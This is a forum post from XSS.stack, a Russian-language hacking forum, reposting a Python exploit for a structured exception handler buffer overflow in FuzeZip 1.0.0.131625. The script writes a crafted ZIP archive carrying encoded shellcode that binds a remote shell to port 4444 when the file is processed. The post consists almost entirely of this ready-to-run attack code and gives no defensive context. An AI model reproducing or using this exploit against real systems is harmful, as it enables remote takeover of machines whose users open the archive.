• XSS.stack #1 – первый литературный журнал от юзеров форума

Local FuzeZip 1.0.0.131625 Buffer Overflow

Отслеживать
DarckSol

DarckSol

(L1) cache
Пользователь
Регистрация
17.03.2008
Сообщения
894
Реакции
182
FuzeZip version 1.0.0.131625 structured exception handler buffer overflow exploit that binds a shell to port 4444.

Код: 
#!/usr/bin/python
# Exploit Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0
# Date: 16.Apr.2013 Vulnerability reported
# Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon
# Organization: RealPentesting 
# Vendor Homepage: http://fuzezip.com/
# Software Link: http://download.fuzezip.com/FuzeZipSetup.exe
# Version: 1.0.0.131625
# Tested on: Windows 2003 Server Standard SP2

header1 = (
"\x50\x4B\x03\x04\x0A\x00\x00\x00\x00\x00\xE5\x18\xE9\x3E"
"\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\xBF\x17\x00\x00"
)

#0x003F 335C

seh = "\x9a\x9f"
nextsh = "\x58\x70"

header_m = "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x74\x65\x73\x74\x21\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\xE5\x18\xE9\x3E\xCC\xD4\x7C\x56\x0F\x00\x00\x00\x0F\x00\x00\x00\xBF\x17\x00\x00\x00\x00\x00\x00\x01\x00\x20\x08\x00\x00\x00\x00\x00\x00"
header_f = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\xED\x17\x00\x00\xEC\x17\x00\x00\x00\x00"

venetian = (
"\x55\x55"
"\x72"
"\x58"
"\x72"
"\x05\x25\x11"
"\x72"
"\x2d\x11\x11"
)

shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"
"AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"
"BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"
"TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"
"3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"
"QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"
"K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"
"2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"
"60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"
"KKK045M5WKQ7N3RRRORJM0QCKOHUA"
)

print len(shellcode)

payload = "\x90" * 818 + nextsh + seh + venetian + "\x90" * 109 + "\x72" + shellcode + "\x43" * 4323

buff = payload  
print len(payload)
mefile = open('josep.zip','w')
mefile.write(header1 + buff + header_m + buff + header_f)
mefile.close()
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх